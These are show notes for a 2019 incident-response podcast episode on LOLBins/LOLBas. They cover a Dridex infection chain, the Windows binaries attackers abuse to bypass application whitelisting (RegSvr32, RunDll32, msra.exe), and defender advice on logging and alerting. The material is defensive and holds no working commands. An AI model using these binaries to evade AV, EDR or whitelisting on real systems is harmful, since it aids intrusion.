Formerly the Brakeing Down Incident Response Podcast
Recorded Oct 2019
TOPIC: Laughing at Binaries - LOLBin/LOLBas
OUR GUEST WILL BE:
Oddvar Moe, Sr. Security Consultant TrustedSec - Red Teamer
@Oddvarmoe
Blog - https://oddvar.moe/
lolbas-project.com
https://github.com/api0cradle/UltimateAppLockerByPassList
https://github.com/api0cradle/PowerAL
OUR SPONSORS:
NEWS-WORTHY:
Cyber Security Awareness Month
Share something that can help SMBs, your family or friends
Flaw with SUDO that lets you get admin priv when denied
Patch patch patch...
Microsoft Enables Tamper Protection by Default for all Windows 10 Users to Defend Against Attacks
Most Americans do not know what MFA is????
Hackers bypassing some types of 2FA security FBI warns
SITE-WORTHY:
Malware Archaeology Logging tips - List of Binaries to monitor
Guest - LolBin/LolBas - api0cradle - aka Oddvar Moe
TOOL-WORTHY:
HUMIO - Free 2GB/day 7 day retention
Guest:
https://github.com/PowerShellMafia/CimSweep - Matt Graeber – Agentless using CIM/WMI
http://nirsoft.net/ (DLL Export viewer, Reg DLL View, Password recovery, network tools +++)
Get injected-thread by Jared Atkinson - https://gist.github.com/jaredcatkinson/23905d34537ce4b5b1818c3e6405c1d2
https://github.com/Neo23x0/sigma - Standardized ruleset for SIEMs
MALWARE OF THE MONTH:
New Dridex version
Delivered via Office document or Email with URL
wscript/csript downloads bad binary named Chrome.exe
Calls Scheduled task for persistence
Chrome calls msra.exe for comms
C:\Windows\syswow64\Msra.exe chrome.exe
So another LOLBin ? This is what prompted this podcast
TOPIC OF THE DAY:
Laughing at Binaries - LOLBin/LOLBas
What is a LOLBin and LOLBas?
It stands for Living off the Land Binary and Scripts
Libraries too, Dlls
What started all this?
@SubTee Casey Smith efforts on Application Whitelisting bypasses from 2015 ish where he found ways to use existing binaries on the system to do bad things like RegSvr32, RegAsm, RunDll32, and several others
Why are these an issue for us Defenders?
Well Pentesters and Red Teams use them to get around security solutions like AV, EDR and App Whitelisting
Do these normally execute? If so how noisy are they?
Some are noisy
What do we need to watch out for?
Command line parameters are key
What is are the parameters they are executing with these utilities
Are there any lists people can use?
Malware Archaeology Logging page has a list and link to Oddvar’s page
What about security solutions, do we need to be concerned with these?
Yes, many AV and EDRs will not have alerts for these items
You will need to build some alerts and filter out the good/noise
What about logging theme?
Use the list(s) and build a lookup list that you can add to 4688 events or Sysmon 1 and 7 events and monitor them
What about MITRE ATT&CK, do they reference these?
Yes, there are several of these mentioned in MITRE ATT&CK, so map your tools to ATT&CK Techniques
Are there ways to test for these LOLs
What else do people need to watch out for?
Other Articles:
-------------------
Casey Smith @SubTee - Red Canary
Bypassing Application Whitelisting
SHMOOCon 2015 -
SANS
DerbyCon 2016 -
DerbyCon 2019 -
Oddvar Moe talk on LOLBin at DerbyCon 2018
Alternate Data Streams: